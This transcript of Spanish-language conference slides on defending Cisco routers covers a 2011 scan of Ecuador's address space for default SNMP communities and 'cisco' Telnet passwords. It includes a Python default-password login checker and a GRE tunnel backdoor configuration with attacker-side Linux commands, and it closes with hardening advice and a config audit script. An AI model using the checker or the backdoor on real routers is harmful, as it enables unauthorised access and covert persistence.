Defending Our Cisco Router (Defendiendo Nuestro Router CISCO)
DESCRIPTION
Slides from the talk "Defendiendo Nuestro Router CISCO" (Defending Our Cisco Router), given at the E-Security Conferences event in Guayaquil, Ecuador. Follow me on Twitter: @KFS
TRANSCRIPT
![Page 1: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/1.jpg)
DEFENDING OUR CISCO ROUTER
E-Security Conferences, Guayaquil, Ecuador - 2011
by Leonardo Pigñer (@KFS)
![Page 2: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/2.jpg)
Leonardo Pigñer, Director of Professional Services
@base4sec
@KFS
@ekoparty
KUNGFOOSION.com
![Page 3: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/3.jpg)
Agenda
1. Why Cisco?
2. Types of Attacks
3. Backdoors
4. Recommendations
![Page 4: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/4.jpg)
Why Cisco?
Source: http://newsroom.cisco.com/documents/10157/1204766/Public_Corporate_Overview_FY11_Q3.pdf
![Page 5: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/5.jpg)
SECURITY
Why Hack Routers?
![Page 6: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/6.jpg)
Why Hack Routers?
“The Network Administrator”
![Page 7: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/7.jpg)
Complex Updates...
![Page 8: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/8.jpg)
- Licenses ($$$)
- Discontinued Hardware
![Page 9: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/9.jpg)
How Do We Get “Statistics” for ECUADOR?
![Page 10: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/10.jpg)
LACNIC: the Latin America and Caribbean Internet Addresses Registry
wget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest
lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated
lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated
lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated
lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated
lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated
lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated
lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated
perl lacnic_parser.pl
![Page 11: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/11.jpg)
Ecuador (EC) IPv4 prefixes extracted from the LACNIC file:
157.100.0.0/16, 186.0.144.0/21, 186.3.0.0/18, 186.3.64.0/18, 186.3.128.0/17, 186.4.128.0/17, 186.5.0.0/17, 186.42.0.0/17, 186.42.128.0/17, 186.43.128.0/18, 186.46.0.0/17, 186.46.128.0/17, 186.47.0.0/16, 186.65.0.0/18, 186.66.0.0/17, 186.66.128.0/17, 186.68.0.0/15, 186.70.0.0/15, 186.101.0.0/16, 186.178.0.0/16, 190.8.180.0/22, 190.9.160.0/20, 190.9.176.0/20, 190.10.128.0/18, 190.10.192.0/18, 190.11.0.0/19, 190.12.0.0/19
192.207.40.0/24, 192.207.41.0/24, 192.207.42.0/24, 192.207.65.0/24, 192.207.66.0/24, 192.207.67.0/24, 192.207.68.0/24, 192.207.244.0/24, 200.0.28.0/22, 200.0.63.0/24, 200.0.73.0/24, 200.0.74.0/24, 200.0.75.0/24, 200.0.76.0/24, 200.0.77.0/24, 200.0.78.0/24, 200.1.6.0/24, 200.1.161.0/24, 200.1.172.0/24, 200.7.83.0/24, 200.7.192.0/19, 200.7.224.0/19, 200.9.96.0/24, 200.9.176.0/24, 200.9.248.0/24, 200.10.147.0/24, 200.10.148.0/22
190.154.0.0/17, 190.154.128.0/17, 190.155.0.0/17, 190.155.128.0/17, 190.214.0.0/17, 190.214.128.0/17, 192.188.44.0/24, 192.188.45.0/24, 192.188.46.0/24, 192.188.47.0/24, 192.188.48.0/24, 192.188.49.0/24, 192.188.50.0/24, 192.188.51.0/24, 192.188.52.0/24, 192.188.53.0/24, 192.188.54.0/24, 192.188.55.0/24, 192.188.56.0/24, 192.188.57.0/24, 192.188.58.0/24, 192.188.59.0/24, 192.188.60.0/24, 192.188.194.0/24, 192.188.195.0/24, 192.188.196.0/24, 192.188.197.0/24
190.12.32.0/19, 190.15.128.0/20, 190.52.64.0/20, 190.52.192.0/20, 190.57.128.0/18, 190.94.128.0/19, 190.95.128.0/19, 190.95.160.0/19, 190.95.192.0/19, 190.95.224.0/19, 190.96.96.0/21, 190.99.72.0/21, 190.107.64.0/20, 190.107.232.0/21, 190.108.64.0/21, 190.110.192.0/19, 190.111.64.0/20, 190.120.64.0/20, 190.120.80.0/20, 190.123.0.0/20, 190.123.48.0/20, 190.130.128.0/17, 190.131.0.0/18, 190.131.64.0/18, 190.131.128.0/18, 190.152.0.0/17, 190.152.128.0/17
200.105.224.0/20, 200.105.240.0/20, 200.107.0.0/19, 200.107.32.0/19, 200.107.248.0/21, 200.110.64.0/20, 200.110.80.0/20, 200.110.112.0/20, 200.110.232.0/21, 200.115.32.0/20, 200.124.224.0/20, 200.124.240.0/20, 200.125.128.0/20, 200.125.144.0/20, 200.125.192.0/19, 200.125.224.0/19, 200.126.0.0/19, 201.217.64.0/19, 201.217.96.0/19, 201.218.0.0/19, 201.218.32.0/19, 201.219.0.0/19, 201.219.32.0/19, 201.238.128.0/19, 201.238.160.0/20, 201.238.176.0/20
200.12.169.0/24, 200.12.196.0/22, 200.14.34.0/24, 200.14.83.0/24, 200.16.94.0/24, 200.24.192.0/19, 200.25.128.0/19, 200.25.160.0/19, 200.25.192.0/20, 200.25.208.0/20, 200.29.240.0/21, 200.49.240.0/21, 200.50.232.0/21, 200.55.224.0/20, 200.55.248.0/21, 200.63.192.0/19, 200.63.224.0/20, 200.63.240.0/20, 200.69.160.0/20, 200.69.176.0/20, 200.73.200.0/21, 200.85.80.0/21, 200.90.152.0/21, 200.93.192.0/19, 200.93.224.0/20, 200.93.248.0/21, 200.105.112.0/21
Total: 1,698,560
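The extraction step above (download the LACNIC delegated file, keep the EC IPv4 records, turn each start/count pair into CIDR blocks) as an added, runnable example. This is not the talk's lacnic_parser.pl; it assumes the RIR delegated-file format (pipe-separated records, '#' comments, a version header and 'summary' records) and uses constructed sample records, including one 'assigned' line with a made-up date, so that it runs offline.

```python
"""Parse a LACNIC delegated-*-latest file and list one country's IPv4 prefixes.

Added example; this is not the talk's lacnic_parser.pl. It assumes the RIR
delegated-file format: '#' comment lines, a version header, 'summary'
records with no range, and address records of the form
registry|cc|type|start|value|date|status[|extensions]
where `value` is a host count that need not be a power of two.
"""
import ipaddress
import sys

# Constructed sample: the records shown on the slide, plus a comment, a
# summary record and an 'assigned' record (the 190.8.180.0 date is made up).
SAMPLE = """\
#LACNIC delegated file, constructed for this example
lacnic|*|ipv4|*|1234|summary
lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated
lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated
lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated
lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated
lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated
lacnic|EC|ipv4|190.8.180.0|1024|20070101|assigned
lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated
lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated
"""


def records(text):
    """Yield (cc, type, start, value) for address records only."""
    for line in text.splitlines():
        fields = line.strip().split("|")
        # comments, the version header and summary lines carry no usable range
        if len(fields) < 7 or fields[0].startswith("#"):
            continue
        if fields[2] not in ("ipv4", "ipv6", "asn") or fields[3] == "*":
            continue
        yield fields[1], fields[2], fields[3], int(fields[4])


def ipv4_prefixes(text, cc):
    """CIDR blocks delegated to country `cc`, e.g. 'EC' as in the talk.

    A record covers `value` consecutive addresses from `start`; the count is
    not always a power of two, so summarize_address_range() splits it into
    properly aligned prefixes instead of assuming a single /N.
    """
    prefixes = []
    for rec_cc, kind, start, value in records(text):
        if rec_cc != cc or kind != "ipv4":
            continue
        first = ipaddress.IPv4Address(start)
        last = first + (value - 1)
        prefixes.extend(str(n) for n in ipaddress.summarize_address_range(first, last))
    return prefixes


def address_total(prefixes):
    """Number of addresses covered by a prefix list (the slide's grand total)."""
    return sum(ipaddress.ip_network(p).num_addresses for p in prefixes)


if __name__ == "__main__":
    # usage: python lacnic_prefixes.py delegated-lacnic-latest EC
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    cc = sys.argv[2] if len(sys.argv) > 2 else "EC"
    found = ipv4_prefixes(text, cc)
    print("\n".join(found))
    print("%s: %d prefixes, %d addresses" % (cc, len(found), address_total(found)))
```

Run it against the real file fetched with the wget command above to reproduce the prefix list; the summarize step matters because LACNIC also publishes counts such as 768 or 3072 that do not map to one prefix.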
![Page 12: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/12.jpg)
To Err Is Human; Is Forgiving Divine?
- Default SNMP
- Weak Passwords
- Vulnerabilities
- Protocols
![Page 13: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/13.jpg)
Simple Network Management Protocol (SNMP)
![Page 14: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/14.jpg)
Simple Network Management Protocol (SNMP)
• Versions: SNMPv1 - SNMPv2 (v2c) - SNMPv3
• MIB: Management Information Base
• Community = password
- “public” = read community
- “private” = write community
![Page 15: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/15.jpg)
![Page 16: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/16.jpg)
DEMO: Tripper.pl by @KFS
![Page 17: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/17.jpg)
SNMP Scanning
- public
- private
![Page 18: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/18.jpg)
[Pie chart] Total = 1,695,560; SNMP “default” = 5,925 (≈0% of the total)
SNMP Default
- public = 5,465
- private = 460
![Page 19: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/19.jpg)
[Pie chart] CISCO = 1,212 (20%); OTHERS = 4,713 (80%)
Cisco Devices
![Page 20: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/20.jpg)
IOS Versions
[Bar chart: Cisco devices per IOS release train, y-axis 0 to 700. Train totals from the per-version counts below: 11.2 = 1, 12.0 = 12, 12.1 = 5, 12.2 = 648, 12.3 = 34, 12.4 = 449, 15.0 = 62, 15.1 = 1]
11.2: 11.2(16)P = 1
12.0: 12.0(11) = 1, 12.0(28b) = 2, 12.0(5.4)WC(1) = 2, 12.0(7) = 2, 12.0(7)T = 5
12.1: 12.1(27b) = 1, 12.1(5)T10 = 2, 12.1(5)T8 = 1, 12.1(8c) = 1
12.2: 12.2(15)T = 1, 12.2(15)T17 = 1, 12.2(17) = 1, 12.2(1a) = 4, 12.2(25)SEA = 1, 12.2(25)SEB4 = 1, 12.2(25)SEE2 = 29, 12.2(25)SEE3 = 1, 12.2(33)SB5 = 254, 12.2(33)SRA = 71, 12.2(33)SRC3 = 144, 12.2(33)SRD3 = 135, 12.2(4)YH = 2, 12.2(55)SE = 1, 12.2(6a) = 1, 12.2(8)YN = 1
12.3: 12.3(11)T = 2, 12.3(11)T10 = 1, 12.3(11)T2 = 6, 12.3(11)T3 = 1, 12.3(12c) = 1, 12.3(16) = 2, 12.3(22) = 1, 12.3(23) = 3, 12.3(26) = 1, 12.3(3a) = 2, 12.3(3g) = 1, 12.3(8)YG4 = 1, 12.3(8)YI3 = 12
12.4: 12.4(10) = 1, 12.4(10b) = 4, 12.4(11)T = 4, 12.4(11)XW7 = 1, 12.4(12a) = 3, 12.4(15)T4 = 46, 12.4(15)T5 = 79, 12.4(15)T7 = 7, 12.4(15)T9 = 11, 12.4(18) = 3, 12.4(19) = 168, 12.4(19b) = 8, 12.4(1a) = 3, 12.4(1c) = 11, 12.4(20)T2 = 4, 12.4(20)T5 = 1, 12.4(24)T = 57, 12.4(24)T1 = 7, 12.4(24)T2 = 2, 12.4(24)T4 = 1, 12.4(3g) = 3, 12.4(3h) = 4, 12.4(3i) = 3, 12.4(4)T8 = 8, 12.4(6)T11 = 9, 12.4(6)T7 = 1
15.0: 15.0(1)M2 = 48, 15.0(1)M3 = 5, 15.0(1)M4 = 4, 15.0(1)M5 = 1, 15.0(1)M7 = 4
15.1: 15.1(2)T4 = 1
![Page 21: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/21.jpg)
12.2
• End of Sale
• End of Maintenance
![Page 22: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/22.jpg)
TELNET
Default Password:
“cisco”
![Page 23: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/23.jpg)
[Pie chart] CISCO via SNMP = 1,212 (99%); TELNET with “cisco” = 29 (1%)
TELNET with “cisco”
![Page 24: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/24.jpg)
[Pie chart] TELNET “cisco” = 29 (69%); ENABLE “cisco” = 13 (31%)
ENABLE with “cisco”
![Page 25: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/25.jpg)
DEMO: getCISCO by @KFS
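The check behind the last three slides (log in over Telnet with the default password, then try the same word for enable), written out as an added example. It is not the getCISCO tool from the talk: it speaks just enough Telnet over a raw socket to refuse option negotiation (telnetlib is deprecated in current Python), and it assumes the IOS default prompts ("Username:"/"Password:", ">" for user EXEC, "#" for privileged EXEC). Trying the password as the username when a "Username:" prompt appears is this example's own assumption.

```python
"""Check whether a Cisco IOS router accepts the default Telnet/enable password.

Added example; not the talk's getCISCO tool. It handles just enough Telnet
(RFC 854 option refusal) over a raw socket because telnetlib is deprecated
in modern Python. Assumed IOS defaults: "Username:"/"Password:" login prompts,
">" for user EXEC and "#" for privileged EXEC. If a "Username:" prompt
appears, the same word is tried as the username (an assumption).
"""
import socket
import time

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251


def strip_iac(data):
    """Split a received chunk into (text, reply, leftover).

    Every DO x is answered WONT x and every WILL x with DONT x, so the
    router falls back to plain NVT ASCII; other two-byte commands are
    dropped, IAC IAC is an escaped 0xFF data byte, and a command cut off at
    the end of the chunk is returned as leftover for the next read.
    """
    text, reply, i = bytearray(), bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= len(data):
            break
        cmd = data[i + 1]
        if cmd == IAC:
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= len(data):
                break
            opt = data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        else:
            i += 2
    return bytes(text), bytes(reply), bytes(data[i:])


def expect(sock, patterns, timeout=5.0):
    """Read until one of `patterns` shows up; returns (index, text) or (-1, text)."""
    buf, pending = b"", b""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        sock.settimeout(max(0.1, deadline - time.monotonic()))
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        text, reply, pending = strip_iac(pending + chunk)
        if reply:
            sock.sendall(reply)
        buf += text
        for idx, pat in enumerate(patterns):
            if pat in buf:
                return idx, buf.decode("latin-1")
    return -1, buf.decode("latin-1")


def check_default_password(host, password="cisco", port=23):
    """'enable' if `password` reaches privileged EXEC, 'login' if only user EXEC,
    None if it is rejected. Run only against devices you are authorised to test;
    a login banner containing '>' or '#' would confuse the prompt matching."""
    with socket.create_connection((host, port), timeout=5) as s:
        idx, _ = expect(s, [b"Username:", b"Password:"])
        if idx == 0:
            s.sendall(password.encode() + b"\r\n")       # username guess = same word
            idx, _ = expect(s, [b"Password:"])
        if idx < 0:
            return None
        s.sendall(password.encode() + b"\r\n")
        idx, _ = expect(s, [b"#", b">", b"Password:", b"% "])
        if idx == 0:
            return "enable"                               # privilege-15 login
        if idx != 1:
            return None                                   # re-prompt or error: rejected
        s.sendall(b"enable\r\n")
        idx, _ = expect(s, [b"Password:", b"#", b"% "])
        if idx == 0:
            s.sendall(password.encode() + b"\r\n")
            idx, _ = expect(s, [b"#", b"Password:", b"% "])
            return "enable" if idx == 0 else "login"
        return "enable" if idx == 1 else "login"
```

The negotiation handling is the part people get wrong: IOS sends DO/WILL options before the prompt, and a client that neither answers nor strips them either stalls or sees 0xFF garbage in the prompt text.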
![Page 26: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/26.jpg)
Vulnerabilities?
![Page 27: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/27.jpg)
Vulnerabilities?
getIOS.pl
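Turning a sysDescr or "show version" banner into a release you can compare against advisories, which is what the version chart above and getIOS.pl are about, as an added example. It is not the talk's getIOS.pl; it assumes the standard IOS banner ("..., Version 12.4(15)T5, RELEASE SOFTWARE ..."), uses constructed sample strings, and takes the talk's statement that the 12.2 train is end-of-sale/end-of-maintenance as the only "too old" rule, to be extended from Cisco's own end-of-life notices.

```python
"""Pull the IOS release out of sysDescr / "show version" text and bucket it by train.

Added example; not the talk's getIOS.pl. It assumes the standard IOS banner
format "..., Version 12.4(15)T5, RELEASE SOFTWARE (fc1)". END_OF_LIFE_TRAINS
only encodes the talk's statement about 12.2; extend it from Cisco's notices.
"""
import re
from collections import Counter

VERSION_RE = re.compile(r"Version\s+(\d+\.\d+\([^)]+\)[A-Za-z0-9().]*)")
PARTS_RE = re.compile(r"^(\d+)\.(\d+)\(([^)]+)\)(.*)$")
END_OF_LIFE_TRAINS = {"12.2"}            # from the "12.2 end of maintenance" slide

# Constructed sysDescr strings in the two banner styles IOS has used, plus a non-IOS host.
SAMPLES = [
    "Cisco IOS Software, 2800 Software (C2800NM-ADVIPSERVICESK9-M), Version 12.4(15)T5, RELEASE SOFTWARE (fc1)",
    "Cisco IOS Software, 7200 Software (C7200-SPSERVICESK9-M), Version 12.2(33)SB5, RELEASE SOFTWARE (fc1)",
    "Cisco Internetwork Operating System Software \r\nIOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.3(11)T2, RELEASE SOFTWARE (fc1)",
    "Cisco IOS Software, C2900 Software (C2900-UNIVERSALK9-M), Version 15.0(1)M2, RELEASE SOFTWARE (fc2)",
    "Linux gw 2.6.32 #1 SMP x86_64",
]


def extract_version(text):
    """'12.4(15)T5' from a sysDescr or show-version blob, or None if absent."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def parse_version(version):
    """Split '12.4(15)T5' into (train, maintenance, suffix) = ('12.4', '15', 'T5')."""
    m = PARTS_RE.match(version)
    if not m:
        raise ValueError("not an IOS version: %r" % version)
    major, minor, maint, suffix = m.groups()
    return "%s.%s" % (major, minor), maint, suffix


def is_end_of_life(version):
    return parse_version(version)[0] in END_OF_LIFE_TRAINS


def tally_by_train(descriptions):
    """Histogram by train, like the slide's chart; non-IOS strings are skipped."""
    counts = Counter()
    for text in descriptions:
        v = extract_version(text)
        if v:
            counts[parse_version(v)[0]] += 1
    return counts


if __name__ == "__main__":
    for train, n in sorted(tally_by_train(SAMPLES).items()):
        flag = "  (end of maintenance per the talk)" if train in END_OF_LIFE_TRAINS else ""
        print("%-5s %d%s" % (train, n, flag))
```

The train (12.4, 15.0, ...) is what Cisco's advisories are keyed on; the maintenance number and suffix ("(15)T5") decide whether a given fixed release applies, so keep all three parts rather than treating the version as one opaque string.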
![Page 28: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/28.jpg)
Protocol attacks: IRPAS, the “Internetwork Routing Protocol Attack Suite”
Supported protocols:
• CDP
• IRDP
• IGRP
• EIGRP (discovery)
• RIPv1 (discovery)
• RIPv2 (discovery)
• OSPF (discovery)
• HSRP
• DHCP DORA
• ICMP Redirects
http://www.phenoelit-us.org/
![Page 29: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/29.jpg)
http://www.networkworld.com/news/2011/080411-blackhat-ospf-vulnerability.html
![Page 30: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/30.jpg)
![Page 31: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/31.jpg)
Backdoor with a GRE Tunnel
![Page 32: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/32.jpg)
Cisco (on the compromised router; [Publica_Cisco] and [Publica_Linux] are the two public addresses):
interface Tunnel2
 ip address 2.2.2.1 255.255.255.0
 tunnel source [Publica_Cisco]
 tunnel destination [Publica_Linux]
 tunnel mode gre ip
! The slide had source and destination the other way round; on IOS,
! "tunnel source" must be the router's own address or interface, and the
! tunnel stays down otherwise.

Linux (attacker side):
modprobe ip_gre
ip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255
ip link set a_VICTIMA_2 up
ip addr add 2.2.2.2 dev a_VICTIMA_2
ip route add 2.2.2.0/24 dev a_VICTIMA_2

DEMO!
![Page 33: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/33.jpg)
DIK “DA IOS ROOTKIT”, by Sebastian 'topo' Muñiz
![Page 34: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/34.jpg)
http://cir.recurity.com/cir/default.aspx
![Page 35: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/35.jpg)
TCL Backdoor
• Requires “ENABLE” (privileged EXEC)
• IOS 12.2(25)S, 12.3(2)T
• Works on other versions too...
• “tclsh”
DEMO!
![Page 36: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/36.jpg)
Recommendations
@base4sec
• Update the software
• Disable unused services
• Block unwanted traffic
• Segment the management network
• Correlate logs
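A concrete way to act on the recommendations and on the two backdoors shown earlier: an added config audit (not part of the talk's material) that reads an IOS running-config and flags the defaults the scan found (public/private communities, "cisco" passwords, Telnet on the vty lines, HTTP, no syslog) as well as the traces a GRE-tunnel or Tcl backdoor leaves behind (a Tunnel interface, an EEM/kron/Tcl hook). Both sample configs are constructed: WEAK is a router as the talk found them, HARDENED is the same box after the recommendations; "review" findings are things to verify, not proof of compromise.

```python
"""Audit a Cisco IOS running-config for the weaknesses and backdoor traces in this talk.

Added example, not part of the talk's material. The checks are line matches on
IOS configuration syntax; "review" findings are things to verify by hand (a
Tunnel interface or an EEM/kron/Tcl hook can be legitimate), not proof of
compromise. Both sample configs below are constructed for the example.
"""
import re

WEAK = """\
enable password cisco
snmp-server community public RO
snmp-server community private RW
ip http server
interface Tunnel2
 ip address 2.2.2.1 255.255.255.0
 tunnel source 198.51.100.1
 tunnel destination 203.0.113.9
event manager applet hidden
 event timer watchdog time 60
 action 1.0 cli command "tclsh flash:x.tcl"
line vty 0 4
 password cisco
 login
 transport input telnet
"""

HARDENED = """\
service password-encryption
enable secret 5 $1$xxxx$placeholderhashvalue
username admin secret 5 $1$xxxx$placeholderhashvalue
no ip http server
no cdp run
ip ssh version 2
access-list 10 permit 10.0.0.0 0.0.0.255
snmp-server community M0n1t0r-R0 RO 10
logging host 10.0.0.5
line vty 0 4
 access-class 10 in
 login local
 transport input ssh
"""

def sections(config):
    """Yield (command, [sub-commands]); IOS indents sub-commands by one space."""
    top, subs = None, []
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and top is not None:
            subs.append(raw.strip())
            continue
        if top is not None:
            yield top, subs
        top, subs = raw.strip(), []
    if top is not None:
        yield top, subs

def audit(config):
    """Return [(severity, message)]; an empty list means nothing was flagged."""
    found = []
    parsed = list(sections(config))
    top_level = [cmd for cmd, _ in parsed]
    for cmd, subs in parsed:
        w = cmd.split()
        if cmd.startswith("snmp-server community"):
            if w[2].lower() in ("public", "private"):
                found.append(("high", "default SNMP community '%s'" % w[2]))
            if len(w) < 5:                                  # nothing after RO/RW: no ACL
                found.append(("medium", "SNMP community '%s' has no access-list" % w[2]))
        elif cmd.startswith("enable password"):
            found.append(("high", "enable password is reversible; use enable secret"))
        elif cmd == "ip http server":
            found.append(("medium", "HTTP server enabled"))
        elif cmd.startswith("interface Tunnel"):
            dest = [s.split()[-1] for s in subs if s.startswith("tunnel destination")]
            found.append(("review", "%s to %s: confirm this tunnel is legitimate"
                          % (w[1], dest[0] if dest else "?")))
        elif cmd.startswith(("event manager applet", "kron policy-list", "scripting tcl")):
            found.append(("review", "scheduled or Tcl automation: %s" % cmd))
        elif cmd.startswith("line vty"):
            if any(s.startswith("password") for s in subs) and "login local" not in subs:
                found.append(("high", "%s uses a shared line password" % cmd))
            if "transport input ssh" not in subs:
                found.append(("high", "%s is not restricted to SSH" % cmd))
            if not any(s.startswith("access-class") for s in subs):
                found.append(("medium", "%s has no access-class" % cmd))
    if "service password-encryption" not in top_level:
        found.append(("low", "service password-encryption not set"))
    if not any(re.match(r"logging (host )?\d", c) for c in top_level):
        found.append(("medium", "no syslog destination configured"))
    if "no cdp run" not in top_level:
        found.append(("low", "CDP left enabled globally (the IOS default)"))
    return found

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print("== %s: %d finding(s)" % (label, len(audit(cfg))))
        for sev, msg in audit(cfg):
            print("  [%s] %s" % (sev, msg))
```

Feed it the output of "show running-config" collected over the management network; the "review" items are the ones to correlate with change records and logs, since a Tunnel interface or an EEM applet nobody remembers configuring is exactly what the GRE and Tcl backdoors above look like from the inside.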
![Page 37: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/37.jpg)
Questions?
@base4sec
![Page 38: Defendiendo Nuestro Router CISCO](https://reader034.vdocument.in/reader034/viewer/2022052506/557afd31d8b42a79308b48bc/html5/thumbnails/38.jpg)
THANK YOU!!
@KFS KUNGFOOSION.com